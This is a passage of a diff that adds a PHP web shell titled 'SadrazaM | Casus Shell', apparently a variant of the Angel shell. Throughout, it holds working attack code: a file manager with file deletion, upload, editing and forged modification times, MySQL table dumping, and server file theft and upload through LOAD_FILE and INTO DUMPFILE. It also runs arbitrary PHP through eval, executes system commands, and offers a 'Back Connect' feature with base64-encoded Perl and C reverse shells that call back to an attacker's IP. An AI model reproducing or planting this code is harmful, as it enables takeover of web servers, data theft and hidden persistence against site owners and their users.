        '); + $filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql'); + header('Content-type: application/unknown'); + header('Content-Disposition: attachment; filename='.$filename); + $mysqldata = ''; + while ($currow = mysql_fetch_array($result)) { + if (isset($table[$currow[0]])) { + $mysqldata .= sqldumptable($currow[0]); + } + } + mysql_close(); + exit; +} + +// -и| MYSQL--+++-+ +if($doing=='mysqldown'){ + if (!$dbname) { + $errmsg = 'Please input dbname'; + } else { + dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); + if (!file_exists($mysqldlfile)) { + $errmsg = 'The file you want Downloadable was nonexistent'; + } else { + $result = q("select load_file('$mysqldlfile');"); + if(!$result){ + q("DROP TABLE IF EXISTS tmp_angel;"); + q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);"); + //+|-#+ф|-+|#э-+++|-,##|т|Ў-+|-+б+++э+Є# |м__angel_1111111111_eof__|-+-+ -##+-ъ+ |-|щ+Ў + q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';"); + $result = q("select content from tmp_angel"); + q("DROP TABLE tmp_angel"); + } + $row = @mysql_fetch_array($result); + if (!$row) { + $errmsg = 'Load file failed '.mysql_error(); + } else { + $fileinfo = pathinfo($mysqldlfile); + header('Content-type: application/x-'.$fileinfo['extension']); + header('Content-Disposition: attachment; filename='.$fileinfo['basename']); + header("Accept-Length: ".strlen($row[0])); + echo $row[0]; + exit; + } + } + } +} + +?> + + + +<?php echo str_replace('.','','SadrazaM | Casus Shell');?> + + + + + + + + + + + + +
        Ver: 2010 ()
        Safe Mode: + Cıkıs | + File Manager | + MySQL Manager | + MySQL Upload & Download | + Komut Calıstır | + PHP Variable | + Eval PHP Code + | Back Connect +
        +'); + + p(''); + + //#щ+|- +-++-|+-+ |--+-+ + $dirdata=array(); + $filedata=array(); + + if ($view_writable) { + $dirdata = GetList($nowpath); + } else { + // -+-+--#э + $dirs=@opendir($dir); + while ($file=@readdir($dirs)) { + $filepath=$nowpath.$file; + if(@is_dir($filepath)){ + $dirdb['filename']=$file; + $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); + $dirdb['dirchmod']=getChmod($filepath); + $dirdb['dirperm']=getPerms($filepath); + $dirdb['fileowner']=getUser($filepath); + $dirdb['dirlink']=$nowpath; + $dirdb['server_link']=$filepath; + $dirdb['client_link']=ue($filepath); + $dirdata[]=$dirdb; + } else { + $filedb['filename']=$file; + $filedb['size']=sizecount(@filesize($filepath)); + $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); + $filedb['filechmod']=getChmod($filepath); + $filedb['fileperm']=getPerms($filepath); + $filedb['fileowner']=getUser($filepath); + $filedb['dirlink']=$nowpath; + $filedb['server_link']=$filepath; + $filedb['client_link']=ue($filepath); + $filedata[]=$filedb; + } + }// while + unset($dirdb); + unset($filedb); + @closedir($dirs); + } + @sort($dirdata); + @sort($filedata); + $dir_i = '0'; + foreach($dirdata as $key => $dirdb){ + if($dirdb['filename']!='..' && $dirdb['filename']!='.') { + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + $dir_i++; + } else { + if($dirdb['filename']=='..') { + p(''); + p(''); + p(''); + } + } + } + + p(''); + p(''); + makehide('action','file'); + makehide('thefile'); + makehide('doing'); + makehide('dir',$nowpath); + $file_i = '0'; + foreach($filedata as $key => $filedb){ + if($filedb['filename']!='..' && $filedb['filename']!='.') { + $fileurl = str_replace(SA_ROOT,'',$filedb['server_link']); + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + $file_i++; + } + } + p(''); + p('
        +'goaction')); +makehide('action'); +formfoot(); + +$errmsg && m($errmsg); + +// +ё+б|#|#-++| +!$dir && $dir = '.'; +$nowpath = getPath(SA_ROOT, $dir); +if (substr($dir, -1) != '/') { + $dir = $dir.'/'; +} +$uedir = ue($dir); + +if (!$action || $action == 'file') { + + // +-|-|--||щ+Ў + $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable'; + + // ++| -+-+ + if ($doing == 'deldir' && $thefile) { + if (!file_exists($thefile)) { + m($thefile.' directory does not exist'); + } else { + m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed')); + } + } + + // ||+и-+-+ + elseif ($newdirname) { + $mkdirs = $nowpath.$newdirname; + if (file_exists($mkdirs)) { + m('Directory has already existed'); + } else { + m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed')); + @chmod($mkdirs,0777); + } + } + + // +-|л+-+ + elseif ($doupfile) { + m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed')); + } + + // #р+н+-+ + elseif ($editfilename && $filecontent) { + $fp = @fopen($editfilename,'w'); + m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed')); + @fclose($fp); + } + + // #р+н+-+ -Ї-+ + elseif ($pfile && $newperm) { + if (!file_exists($pfile)) { + m('The original file does not exist'); + } else { + $newperm = base_convert($newperm,8,10); + m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed')); + } + } + + // +-| + elseif ($oldname && $newfilename) { + $nname = $nowpath.$newfilename; + if (file_exists($nname) || !file_exists($oldname)) { + m($nname.' has already existed or original file does not exist'); + } else { + m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? 
' success' : 'failed')); + } + } + + // +|+|+-+ + elseif ($sname && $tofile) { + if (file_exists($tofile) || !file_exists($sname)) { + m('The goal file has already existed or original file does not exist'); + } else { + m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed')); + } + } + + // +--б-#+ф + elseif ($curfile && $tarfile) { + if (!@file_exists($curfile) || !@file_exists($tarfile)) { + m('The goal file has already existed or original file does not exist'); + } else { + $time = @filemtime($tarfile); + m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed')); + } + } + + // ++|и-х-#+ф + elseif ($curfile && $year && $month && $day && $hour && $minute && $second) { + if (!@file_exists($curfile)) { + m(basename($curfile).' does not exist'); + } else { + $time = strtotime("$year-$month-$day $hour:$minute:$second"); + m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed')); + } + } + + // |Є# --++ + elseif($doing == 'downrar') { + if ($dl) { + $dfiles=''; + foreach ($dl as $filepath => $value) { + $dfiles.=$filepath.','; + } + $dfiles=substr($dfiles,0,strlen($dfiles)-1); + $dl=explode(',',$dfiles); + $zip=new PHPZip($dl); + $code=$zip->out; + header('Content-type: application/octet-stream'); + header('Accept-Ranges: bytes'); + header('Accept-Length: '.strlen($code)); + header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz'); + echo $code; + exit; + } else { + m('Please select file(s)'); + } + } + + // + -+++| +-+ + elseif($doing == 'delfiles') { + if ($dl) { + $dfiles=''; + $succ = $fail = 0; + foreach ($dl as $filepath => $value) { + if (@unlink($filepath)) { + $succ++; + } else { + $fail++; + } + } + m('Deleted file have finishedгмchoose '.count($dl).' success '.$succ.' 
fail '.$fail); + } else { + m('Please select file(s)'); + } + } + + //#++ў-ъ#- + formhead(array('name'=>'createdir')); + makehide('newdirname'); + makehide('dir',$nowpath); + formfoot(); + formhead(array('name'=>'fileperm')); + makehide('newperm'); + makehide('pfile'); + makehide('dir',$nowpath); + formfoot(); + formhead(array('name'=>'copyfile')); + makehide('sname'); + makehide('tofile'); + makehide('dir',$nowpath); + formfoot(); + formhead(array('name'=>'rename')); + makehide('oldname'); + makehide('newfilename'); + makehide('dir',$nowpath); + formfoot(); + formhead(array('name'=>'fileopform')); + makehide('action'); + makehide('opfile'); + makehide('dir'); + formfoot(); + + $free = @disk_free_space($nowpath); + !$free && $free = 0; + $all = @disk_total_space($nowpath); + !$all && $all = 0; + $used = $all-$free; + $used_percent = @round(100/($all/$free),2); + p('

        File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)

        '); + +?> + + + + + + + + +
        Bulundugun Dizin (, )
        + +
        '); + p('
        '); + p('WebRoot'); + if ($view_writable) { + p(' | View All'); + } else { + p(' | View Writable'); + } + p(' | Create Directory | Create File'); + if (IS_WIN && IS_COM) { + $obj = new COM('scripting.filesystemobject'); + if ($obj && is_object($obj)) { + $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk'); + foreach($obj->Drives as $drive) { + if ($drive->DriveType == 2) { + p(' | '.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')'); + } else { + p(' | '.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')'); + } + } + } + } + + p('
         FilenameLast modifiedSizeChmod / PermsAction
        0'.$dirdb['filename'].''.$dirdb['mtime'].'--'); + p(''.$dirdb['dirchmod'].' / '); + p(''.$dirdb['dirperm'].''.$dirdb['fileowner'].'Del | Rename
        =Parent Directory
        '.$filedb['filename'].''.$filedb['mtime'].''.$filedb['size'].''); + p(''.$filedb['filechmod'].' / '); + p(''.$filedb['fileperm'].''.$filedb['fileowner'].''); + p('Down | '); + p('Copy | '); + p('Edit | '); + p('Rename | '); + p('Time'); + p('
        Packing download selected - Delete selected'.$dir_i.' directories / '.$file_i.' files
        '); +}// end dir + +elseif ($action == 'sqlfile') { + if($doing=="mysqlupload"){ + $file = $_FILES['uploadfile']; + $filename = $file['tmp_name']; + if (file_exists($savepath)) { + m('The goal file has already existed'); + } else { + if(!$filename) { + m('Please choose a file'); + } else { + $fp=@fopen($filename,'r'); + $contents=@fread($fp, filesize($filename)); + @fclose($fp); + $contents = bin2hex($contents); + if(!$upname) $upname = $file['name']; + dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';"); + m($result ? 'Upload success' : 'Upload has failed: '.mysql_error()); + } + } + } +?> + +'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1'); + formhead(array('title'=>'MYSQL Information','name'=>'dbinfo')); + makehide('action','sqlfile'); + p('

        '); + p('DBHost:'); + makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); + p(':'); + makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); + p('DBUser:'); + makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); + p('DBPass:'); + makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); + p('DBName:'); + makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname)); + p('DBCharset:'); + makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset)); + p('

        '); + formfoot(); + p('
        '); + p('

        Upload file

        '); + p('

        This operation the DB user must has FILE privilege

        '); + p('

        Save path(fullpath): Choose a file: Upload

        '); + p('

        Download file

        '); + p('

        File: Download

        '); + makehide('dbhost'); + makehide('dbport'); + makehide('dbuser'); + makehide('dbpass'); + makehide('dbname'); + makehide('charset'); + makehide('doing'); + makehide('action','sqlfile'); + p('
        '); +} + +elseif ($action == 'sqladmin') { + !$dbhost && $dbhost = 'localhost'; + !$dbuser && $dbuser = 'root'; + !$dbport && $dbport = '3306'; + $dbform = ''; + if(isset($dbhost)){ + $dbform .= "\n"; + } + if(isset($dbuser)) { + $dbform .= "\n"; + } + if(isset($dbpass)) { + $dbform .= "\n"; + } + if(isset($dbport)) { + $dbform .= "\n"; + } + if(isset($dbname)) { + $dbform .= "\n"; + } + if(isset($charset)) { + $dbform .= "\n"; + } + + if ($doing == 'backupmysql' && $saveasfile) { + if (!$table) { + m('Please choose the table'); + } else { + dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + $table = array_flip($table); + $fp = @fopen($path,'w'); + if ($fp) { + $result = q('SHOW tables'); + if (!$result) p('

        '.mysql_error().'

        '); + $mysqldata = ''; + while ($currow = mysql_fetch_array($result)) { + if (isset($table[$currow[0]])) { + sqldumptable($currow[0], $fp); + } + } + fclose($fp); + $fileurl = str_replace(SA_ROOT,'',$path); + m('Database has success backup to '.$path.''); + mysql_close(); + } else { + m('Backup failed'); + } + } + } + if ($insert && $insertsql) { + $keystr = $valstr = $tmp = ''; + foreach($insertsql as $key => $val) { + if ($val) { + $keystr .= $tmp.$key; + $valstr .= $tmp."'".addslashes($val)."'"; + $tmp = ','; + } + } + if ($keystr && $valstr) { + dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error()); + } + } + if ($update && $insertsql && $base64) { + $valstr = $tmp = ''; + foreach($insertsql as $key => $val) { + $valstr .= $tmp.$key."='".addslashes($val)."'"; + $tmp = ','; + } + if ($valstr) { + $where = base64_decode($base64); + dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error()); + } + } + if ($doing == 'del' && $base64) { + $where = base64_decode($base64); + $delete_sql = "DELETE FROM $tablename WHERE $where"; + dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error()); + } + + if ($tablename && $doing == 'drop') { + dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + if (q("DROP TABLE $tablename")) { + m('Drop table of success'); + $tablename = ''; + } else { + m(mysql_error()); + } + } + + $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1'); + + formhead(array('title'=>'MYSQL Manager')); + makehide('action','sqladmin'); + p('

        '); + p('DBHost:'); + makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); + p(':'); + makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); + p('DBUser:'); + makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); + p('DBPass:'); + makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); + p('DBCharset:'); + makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset)); + makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt')); + p('

        '); + formfoot(); +?> + +'recordlist')); + makehide('doing'); + makehide('action','sqladmin'); + makehide('base64'); + makehide('tablename'); + p($dbform); + formfoot(); + + //-б|и- +|+т + formhead(array('name'=>'setdbname')); + makehide('action','sqladmin'); + p($dbform); + if (!$dbname) { + makehide('dbname'); + } + formfoot(); + + //-б|и#э + formhead(array('name'=>'settable')); + makehide('action','sqladmin'); + p($dbform); + makehide('tablename'); + makehide('page',$page); + makehide('doing'); + formfoot(); + + $cachetables = array(); + $pagenum = 30; + $page = intval($page); + if($page) { + $start_limit = ($page - 1) * $pagenum; + } else { + $start_limit = 0; + $page = 1; + } + if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) { + dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); + //+ё+б- +|+т-+-в + $mysqlver = mysql_get_server_info(); + p('

        MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'

        '); + $highver = $mysqlver > '4.1' ? 1 : 0; + + //+ё+б- +|+т + $query = q("SHOW DATABASES"); + $dbs = array(); + $dbs[] = '-- Select a database --'; + while($db = mysql_fetch_array($query)) { + $dbs[$db['Database']] = $db['Database']; + } + makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1)); + $tabledb = array(); + if ($dbname) { + p('

        '); + p('Current dababase: '.$dbname.''); + if ($tablename) { + p(' | Current Table: '.$tablename.' [ Insert | Structure | Drop ]'); + } + p('

        '); + mysql_select_db($dbname); + + $getnumsql = ''; + $runquery = 0; + if ($sql_query) { + $runquery = 1; + } + $allowedit = 0; + if ($tablename && !$sql_query) { + $sql_query = "SELECT * FROM $tablename"; + $getnumsql = $sql_query; + $sql_query = $sql_query." LIMIT $start_limit, $pagenum"; + $allowedit = 1; + } + p('
        '); + p('

        Run SQL query/queries on database '.$dbname.':

        '); + makehide('tablename', $tablename); + makehide('action','sqladmin'); + p($dbform); + p('
        '); + if ($tablename || ($runquery && $sql_query)) { + if ($doing == 'structure') { + $result = q("SHOW COLUMNS FROM $tablename"); + $rowdb = array(); + while($row = mysql_fetch_array($result)) { + $rowdb[] = $row; + } + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + foreach ($rowdb as $row) { + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + } + tbfoot(); + } elseif ($doing == 'insert' || $doing == 'edit') { + $result = q('SHOW COLUMNS FROM '.$tablename); + while ($row = mysql_fetch_array($result)) { + $rowdb[] = $row; + } + $rs = array(); + if ($doing == 'insert') { + p('

        Insert new line in '.$tablename.' table »

        '); + } else { + p('

        Update record in '.$tablename.' table »

        '); + $where = base64_decode($base64); + $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1"); + $rs = mysql_fetch_array($result); + } + p(''); + p($dbform); + makehide('action','sqladmin'); + makehide('tablename',$tablename); + p('
        FieldTypeNullKeyDefaultExtra
        '.$row['Field'].''.$row['Type'].''.$row['Null'].' '.$row['Key'].' '.$row['Default'].' '.$row['Extra'].' 
        '); + foreach ($rowdb as $row) { + if ($rs[$row['Field']]) { + $value = htmlspecialchars($rs[$row['Field']]); + } else { + $value = ''; + } + $thisbg = bg(); + p(''); + p(''); + } + if ($doing == 'insert') { + p(''); + } else { + p(''); + makehide('base64', $base64); + } + p('
        '.$row['Field'].'
        '.$row['Type'].'
        '); + } else { + $querys = @explode(';',$sql_query); + foreach($querys as $num=>$query) { + if ($query) { + p("

        Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."

        "); + switch(qy($query)) + { + case 0: + p('

        Error : '.mysql_error().'

        '); + break; + case 1: + if (strtolower(substr($query,0,13)) == 'select * from') { + $allowedit = 1; + } + if ($getnumsql) { + $tatol = mysql_num_rows(q($getnumsql)); + $multipage = multi($tatol, $pagenum, $page, $tablename); + } + if (!$tablename) { + $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query))); + $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line); + preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches); + $tablename = $matches[1][0]; + } + $result = q($query); + p($multipage); + p(''); + p(''); + if ($allowedit) p(''); + $fieldnum = @mysql_num_fields($result); + for($i=0;$i<$fieldnum;$i++){ + $name = @mysql_field_name($result, $i); + $type = @mysql_field_type($result, $i); + $len = @mysql_field_len($result, $i); + p(""); + } + p(''); + while($mn = @mysql_fetch_assoc($result)){ + $thisbg = bg(); + p(''); + $where = $tmp = $b1 = ''; + foreach($mn as $key=>$inside){ + if ($inside) { + $where .= $tmp.$key."='".addslashes($inside)."'"; + $tmp = ' AND '; + } + $b1 .= ''; + } + $where = base64_encode($where); + if ($allowedit) p(''); + p($b1); + p(''); + unset($b1); + } + tbfoot(); + p($multipage); + break; + case 2: + $ar = mysql_affected_rows(); + p('

        affected rows : '.$ar.'

        '); + break; + } + } + } + } + } else { + $query = q("SHOW TABLE STATUS"); + $table_num = $table_rows = $data_size = 0; + $tabledb = array(); + while($table = mysql_fetch_array($query)) { + $data_size = $data_size + $table['Data_length']; + $table_rows = $table_rows + $table['Rows']; + $table['Data_length'] = sizecount($table['Data_length']); + $table_num++; + $tabledb[] = $table; + } + $data_size = sizecount($data_size); + unset($table); + p('
        Action$name
        $type($len)
        '.html_clean($inside).' Edit | Del
        '); + p(''); + makehide('action','sqladmin'); + p($dbform); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + if ($highver) { + p(''); + p(''); + } + p(''); + foreach ($tabledb as $key => $table) { + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + if ($highver) { + p(''); + p(''); + } + p(''); + } + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + + p(""); + makehide('doing','backupmysql'); + formfoot(); + p("
        NameRowsData_lengthCreate_timeUpdate_timeEngineCollation
        '.$table['Name'].' [ Insert | Structure | Drop ]'.$table['Rows'].''.$table['Data_length'].''.$table['Create_time'].''.$table['Update_time'].''.$table['Engine'].''.$table['Collation'].'
         Total tables: '.$table_num.''.$table_rows.''.$data_size.' 
        Save as file
        "); + fr($query); + } + } + } + tbfoot(); + @mysql_close(); +}//end sql backup + + +elseif ($action == 'backconnect') { + !$yourip && $yourip = $_SERVER['REMOTE_ADDR']; + !$yourport && $yourport = '12345'; + $usedb = array('perl'=>'perl','c'=>'c'); + + $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". + "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". + "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". + "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". + "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". + "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". + "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC". + "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb". + "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd". + "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ". + "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC". + "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". + "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". 
+ "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; + + if ($start && $yourip && $yourport && $use){ + if ($use == 'perl') { + cf('/tmp/angel_bc',$back_connect); + $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &"); + } else { + cf('/tmp/angel_bc.c',$back_connect_c); + $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); + @unlink('/tmp/angel_bc.c'); + $res = execute("/tmp/angel_bc $yourip $yourport &"); + } + m("Now script try connect to $yourip port $yourport ..."); + } + + formhead(array('title'=>'Back Connect')); + makehide('action','backconnect'); + p('

        '); + p('Your IP:'); + makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip)); + p('Your Port:'); + makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport)); + p('Use:'); + makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use)); + makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt')); + p('

        '); + formfoot(); +}//end sql backup + +elseif ($action == 'eval') { + $phpcode = trim($phpcode); + if($phpcode){ + if (!preg_match('#<\?#si', $phpcode)) { + $phpcode = ""; + } + eval("?".">$phpcode'Eval PHP Code')); + makehide('action','eval'); + maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode)); + p('

        Get plugins

        '); + formfooter(); +}//end eval + +elseif ($action == 'editfile') { + if(file_exists($opfile)) { + $fp=@fopen($opfile,'r'); + $contents=@fread($fp, filesize($opfile)); + @fclose($fp); + $contents=htmlspecialchars($contents); + } + formhead(array('title'=>'Create / Edit File')); + makehide('action','file'); + makehide('dir',$nowpath); + makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1)); + maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents)); + formfooter(); +}//end editfile + +elseif ($action == 'newtime') { + $opfilemtime = @filemtime($opfile); + //$time = strtotime("$year-$month-$day $hour:$minute:$second"); + $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12); + formhead(array('title'=>'Clone file was last modified time')); + makehide('action','file'); + makehide('dir',$nowpath); + makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); + makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1)); + formfooter(); + formhead(array('title'=>'Set last modified')); + makehide('action','file'); + makehide('dir',$nowpath); + makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); + p('

        Instead »'); + p('year:'); + makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4)); + p('month:'); + makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2)); + p('day:'); + makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2)); + p('hour:'); + makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2)); + p('minute:'); + makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2)); + p('second:'); + makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2)); + p('

        '); + formfooter(); +}//end newtime + +elseif ($action == 'shell') { + if (IS_WIN && IS_COM) { + if($program && $parameter) { + $shell= new COM('Shell.Application'); + $a = $shell->ShellExecute($program,$parameter); + m('Program run has '.(!$a ? 'success' : 'fail')); + } + !$program && $program = 'c:\windows\system32\cmd.exe'; + !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt'; + formhead(array('title'=>'Execute Program')); + makehide('action','shell'); + makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1)); + p('

        '); + makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter)); + makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); + p('

        '); + formfoot(); + } + formhead(array('title'=>'Execute Command')); + makehide('action','shell'); + if (IS_WIN && IS_COM) { + $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open'); + makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1)); + } + p('

        '); + makeinput(array('title'=>'Command','name'=>'command','value'=>$command)); + makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); + p('

        '); + formfoot(); + + if ($command) { + p('
        ');
        +		if ($execfunc=='wscript' && IS_WIN && IS_COM) {
        +			$wsh = new COM('WScript.shell');
        +			$exec = $wsh->exec('cmd.exe /c '.$command);
        +			$stdout = $exec->StdOut();
        +			$stroutput = $stdout->ReadAll();
        +			echo $stroutput;
        +		} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
        +			$descriptorspec = array(
        +			   0 => array('pipe', 'r'),
        +			   1 => array('pipe', 'w'),
        +			   2 => array('pipe', 'w')
        +			);
        +			$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
        +			if (is_resource($process)) {
        +				fwrite($pipes[0], $command."\r\n");
        +				fwrite($pipes[0], "exit\r\n");
        +				fclose($pipes[0]);
        +				while (!feof($pipes[1])) {
        +					echo fgets($pipes[1], 1024);
        +				}
        +				fclose($pipes[1]);
        +				while (!feof($pipes[2])) {
        +					echo fgets($pipes[2], 1024);
        +				}
        +				fclose($pipes[2]);
        +				proc_close($process);
        +			}
        +		} else {
        +			echo(execute($command));
        +		}
        +		p('
